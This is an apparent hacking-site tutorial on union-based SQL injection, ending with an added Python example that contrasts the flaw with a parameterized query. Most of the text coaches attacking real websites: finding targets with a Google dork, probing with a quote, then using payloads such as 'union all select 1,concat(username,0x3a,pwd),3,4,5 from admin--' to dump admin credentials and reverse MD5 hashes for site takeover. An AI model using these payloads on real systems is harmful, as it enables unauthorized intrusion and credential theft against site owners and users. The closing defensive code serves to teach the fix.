Tutorial: SQL injection

SQL injection tutorial, advanced. Of all the hacks so far, the one most used by h4ck3rs, from n00b to 1337, has been the SQL injection attack. Here at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to work on a huge number of sites.

The hack starts as follows.

Finding vulnerable site

To find a vulnerable site, open Google.

Type in a dork like “inurl:index.php?id=” (without quotes). There are many other similar formats for finding such vulnerable pages.

Now click on any site like

Now, to test if the site is hackable or not, add a ' at the end of the URL.

If the site gives an error like

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”84′ at line 1″

we can assume that it is vulnerable. If not, try some other site.

We have the vulnerable site now. So let's try different SQL injection queries.

Checking the number of columns:

To check the number of columns we do the following:

order by 1-- (if the page loads normally without any error, we proceed below)
order by 2-- (no error)

Similarly check:

order by 3--
order by 4--
order by 5--
order by 6-- => error

If we get an error at 6, like “unknown column”, that means only 5 columns exist.

Finding vulnerable columns:

To find the vulnerable columns we add union all select 1,2,3,4,5-- after

Now the URL becomes union all select 1,2,3,4,5--

After hitting enter, if we see some numbers like 2 and 4 somewhere on the page, then columns 2 and 4 are vulnerable and data can be retrieved from columns 2 and 4. This is important, as we would see data in these columns only.

Finding MySQL version:

To find the SQL version we replace 2 or 4 (or the vulnerable column in your case) with @@version.

The URL would become: union all select 1,@@version,3,4,5--

After hitting enter, the SQL version appears on the page in the vulnerable column space.

Let's assume we got 5.0.90-community-log on the page, which is the SQL version.

Getting Table names:

To get table names, replace @@version in the URL with table_name and add from information_schema.tables-- to the end.

The URL now becomes union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter, the page shows the table names.

Let us assume we got something like this


To take over the site, data should be retrieved from the admin table, as it seems the most likely to contain all the passwords.

Getting the column names:

To get the column names from the table “admin” we do the following: union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--

Converting the tablename to ASCII:
For the real hack above, we first have to convert the table name admin to ASCII values. Convert the tablename to ascii here…ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them.

So now it is 97,100,109,105,110

Put it in place of “ascii of tablename”.

Now it becomes union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page

Getting username and password:

To get the username and password we use union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.

At this point we see the username and password on the page.

The password may be in MD5 hashed form (MD5 is a hash, not encryption); unsalted MD5 hashes of common passwords can easily be reversed by lookup using the following converter-

This was a nice SQL injection hack tutorial. Please comment if you like the post.
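
Every step above works only because the id value is concatenated into the query text. The following added example (not part of the original post) shows that flaw beside a parameterized lookup, using Python's sqlite3 as a stand-in for the PHP/MySQL page; the articles table, its sample row and all function names are assumptions.

```python
import re
import sqlite3

# The page's probes, copied from its steps; "84" is the id in its sample error.
PROBES = ["84'", "84 order by 6--", "84 union all select 1,2,3,4,5--"]

def make_db():
    # Constructed sample data: one 5-column table, matching the page's column count.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT,"
               " author TEXT, body TEXT, created TEXT)")
    db.execute("INSERT INTO articles VALUES (84, 'Hello', 'bob', 'text', '2010-01-01')")
    return db

def get_article_vulnerable(db, raw_id):
    # Root cause: the request parameter is pasted into the SQL text, so
    # everything after the number is parsed as SQL.
    return db.execute("SELECT * FROM articles WHERE id = " + raw_id).fetchall()

def get_article_safe(db, raw_id):
    # Allow-list first (an id is 1-10 ASCII digits), then bind the value so
    # the driver passes it as data and never as SQL text.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    return db.execute("SELECT * FROM articles WHERE id = ?", (int(raw_id),)).fetchall()

def respond(db, raw_id, lookup):
    # Map database errors to a generic response so syntax errors and
    # "column out of range" messages are never echoed to the client.
    try:
        rows = lookup(db, raw_id)
    except sqlite3.Error:
        return 500, "Internal error"
    return (200, rows) if rows else (404, "Not found")

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe), respond(db, probe, get_article_vulnerable),
              respond(db, probe, get_article_safe))
```

Hiding the error message alone is not enough: the vulnerable lookup still answers 200 for order by 5 and 500 for order by 6, and still returns the injected union row. Only the bound parameter removes both.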

